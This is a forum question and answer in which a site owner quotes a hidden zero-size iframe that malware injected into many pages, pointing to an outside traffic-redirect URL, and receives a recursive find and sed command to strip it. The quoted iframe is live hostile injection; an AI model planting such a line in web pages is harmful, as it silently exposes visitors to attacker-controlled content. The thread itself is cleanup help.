A malware has attacked my server and added the line <iframe src=http://pokosa.com/tds/go.php?sid=1 width=0 height=0

Question

Asked: May 29, 20262026-05-29T07:40:17+00:00 2026-05-29T07:40:17+00:00

A malware has attacked my server and added the line

<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

to many of my pages

how can i remove it with grep or if there is any other way i can remove it from all the files it affected

Edit: I saw the comments about using sed, but I need a recursive solution, if there is one

thanks

You must login to add an answer.

Need An Account,

Editorial Team · Answer 1 · 2026-05-29T07:40:17+00:00

Editorial Team

You can use find and sed to recursively find all files of interest and remove the offending line from them.

For example, the following command would remove the offending line from all .html files from the current directory and all its sub-directories.

find . -name "*.html" -exec sed -i 's/<iframe src="http:\/\/pokosa.com\/tds\/go.php?sid=1" width="0" height="0" frameborder="0"><\/iframe>//' {} \;

The Archive Base Latest Questions